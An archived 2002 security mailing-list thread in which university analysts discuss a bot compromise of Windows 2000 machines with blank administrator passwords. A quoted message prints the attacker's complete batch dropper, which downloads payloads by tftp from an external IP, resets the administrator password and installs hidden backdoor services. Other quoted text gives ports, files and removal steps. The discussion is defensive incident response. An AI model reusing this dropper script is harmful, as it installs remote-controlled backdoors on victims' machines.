[unisog] Re: Coordinated Scan

Huba Leidenfrost huba at uidaho.edu
Wed Apr 3 17:03:01 GMT 2002


 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

We fired off sample copies of what we saw here (as probably did many
of you) to SOPHOS, NAV, & F-Secure.  F-Secure now has detection for
this and I'm sure the others will follow. 

I haven't seen a conclusive writeup.  However it would appear that
this is just another rendition of the global threat (GT Bot) as
mentioned earlier (http://bots.lockdowncorp.com/gtbot.html). 
Although we still don't know exactly what the dropper was I'm
inclined to believe that the reason was simply poor user habits in
terms of surfing and password settings.  All the systems we saw
hacked were 2000 Professional where the user had set their
administrator password to nothing.

   H  u  b  a
- -                                                     
HUBA LEIDENFROST           Systems Security Analyst   
huba at uidaho.edu     Information Technology Services  
University Of Idaho      TEL/FAX: 208.885.2126/7539
http://www.its.uidaho.edu/info-security/runsafe.htm  
 
- -----Original Message-----
From: Mark Newman [mailto:mnx at utk.edu]
Sent: Wednesday, April 03, 2002 7:07 AM
To: jeff_bollinger at unc.edu; Jeff Bollinger; Allen Chang
Cc: unisog at sans.org; security at rescomp.berkeley.edu
Subject: Re: [unisog] Re: Coordinated Scan


Anyone found a conclusive writeup on this?

Mark Newman
University of Tennessee

On Monday 01 April 2002 09:48 am, Jeff Bollinger wrote:
> More on this attack.  Here is the actual .bat file used by the
> attacker which gives some great clues:
>
> ----
>
> @echo off
> c:
> cd c:\winnt\system32\vmn32
> mkdir \RECYCLER\S-1-5-21-2686636377-1107193052-384560437-1000
> attrib +s +r +h
> \RECYCLER\S-1-5-21-2686636377-1107193052-384560437-1000 kill sxe*
> kill temp.exe
> del ..\2*.ocx
> del ..\32*.ocx
> del ..\temp2.exe
> PATH=%PATH%;c:\winnt\system32
> move firedaem.exe firedaemon.exe
> del c:\winnt\system32\vmn32.exe
> attrib *.* -r /s
> attrib +s +h +r c:\winnt\system32\vmn32
> attrib c:\winnt\system32\vmn32\asp +s +h
> attrib c:\winnt\system32\vmn32\aspc +s +h
> tftp -i 12.233.26.173 GET ir2.conf
> c:\winnt\system32\vmn32\asp\ir.conf tftp -i 12.233.26.173 GET
> xir.conf c:\winnt\system32\vmn32\aspc\ir.conf tftp -i 12.233.26.173
> GET barm8.gif c:\winnt\system32\vmn32\barm8.gif attrib *.* -r /s
> net user administrator changem
> net share /delete ipc$
> SET MXHOME=c:\winnt\system32\vmn32
> SET MXBIN=c:\winnt\system32\vmn32
> c:\winnt\system32\vmn32\firedaemon -i Ms32dll
> "c:\winnt\system32\vmn32" "c:\winnt\system32\vmn32\lsass.exe"
> "c:\winnt\system32\vmn32\barm8.gif" Y 0 0 Y Y
> c:\winnt\system32\vmn32\firedaemon -i SVHOST
> "c:\winnt\system32\vmn32\asp"
> "c:\winnt\system32\vmn32\asp\SVHOST.EXE"
> "c:\winnt\system32\vmn32\asp\ir.conf" Y 0 0 Y Y
> c:\winnt\system32\vmn32\firedaemon -i MSVC5 
> "c:\winnt\system32\vmn32\aspc"
> "c:\winnt\system32\vmn32\aspc\SVHOST.EXE"
> "c:\winnt\system32\vmn32\aspc\ir.conf" Y 0 0 Y Y
> c:\winnt\system32\vmn32\services start Ms32dll
> c:\winnt\system32\vmn32\services start SVHOST
> c:\winnt\system32\vmn32\services start MSVC5
> echo REGEDIT4  1>>root.reg
> echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\] >>
> root.reg echo "restrictanonymous"="1" >> root.reg
> echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\] >>
> root.reg echo "NTLM"="2" >> root.reg
> regedit /S root.reg
> del root.reg
> services stop tlntsvr
> services delete tlntsvr
> services stop lmhosts
> services start lmhosts
> services start NtLmSsp
> services stop PSEXESVC
> services delete PSEXESVC
>
> Allen Chang wrote:
> > Apologies if I break the thread...
> >
> > Here's my analysis of the compromised computers. First of all,
> > this is not the Backdoor.darkIRC detected by antivirus programs.
> > This backdoor is not detected by the latest NAV patterns.
> >
> > I'm guessing that these computer were compromised through the
> > administrative share with no administrator password on Windows
> > 2000. 
> >
> > *A rouge lsass.exe (with a red u and a smaller green d icon) was
> > installed as a service using firedaemon.exe (or firedaem.exe).
> > You can check for it under Administrative Tools -> Services. The
> > one on our hosts was called ms32dll *Several .tmp files and a
> > rudl32.exe are dropped in the Startup folder but the .tmp  files
> > don't seem to run.
> > *Serve-U FTP, IRC and telnet servers are run on various ports.
> > The IRC configurations(ir.con) seem to indicate that they are set
> > up as XDCC file-serving bots.
> >
> > Judging from this, one should be able to remove the service with
> > a "firedaemon -u ms32dll" This seems to close all the opened
> > ports but I am unsure as to what other damage may have been done.
> >
> > On all the hosts, nmap found the following ports open:
> > Port       State       Service
> > 132/tcp    open        cisco-sys <--tlntsvr.exe (telnet)
> > 135/tcp    open        loc-srv <--svchost.exe
> > 139/tcp    open        netbios-ssn <--NetBIOS sharing (normal)
> > 445/tcp    open        microsoft-ds <-Windows sharing (kind of
> > normal) 1025/tcp   open        listen <--mstask.exe (normal)
> > 8888/tcp   open        sun-answerbook <-- sxe5.tmp (backdoor
> > client) 
> >
> > Running Vision 1.0 (www.foundstone.com) on the compromised
> > computers yielded these additional ports and programs bound to
> > them:
> > 1029/tcp  <-- sxe5.tmp
> > 1031/tcp <-- sxe5.tmp
> > 43958/tcp <--c:\winnt\system32\vmn32\lsass.exe <-not to be
> > confused with the other lsass.exe from MS
> > 3112/tcp <-- c:\winnt\system32\vmn32\lsass.exe
> >
> > According to vmn\ServUStartUpLog.txt (Not confirmed)
> > 3112 <-- ftp
> >
> > Hidden? (Never seen by me)
> > 99/tcp <-- Backdoor command shell?
> >
> > (**Files Found**)
> > C:\Documents and Settings\All Users\Start Menu\Programs\Startup
> > rudl32.exe
> > sxe3.tmp
> > sxe4.tmp
> > sxe5.tmp
> >
> > Other files mentioned at
> > http://www.theorygroup.com/Archive/Unisog/2002/msg00334.html
> >
> > @llen
> > Network Security
> > Office of Residential Computing
> > UC Berkeley

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQA/AwUBPKs1w0pG2S0cMeJwEQLFlACg8TqRo7lO2jLMymLhvEME+CqROfEAoL1M
7H4fhOGU2CbFeKshjk8aZHHm
=8+bO
-----END PGP SIGNATURE-----



More information about the unisog mailing list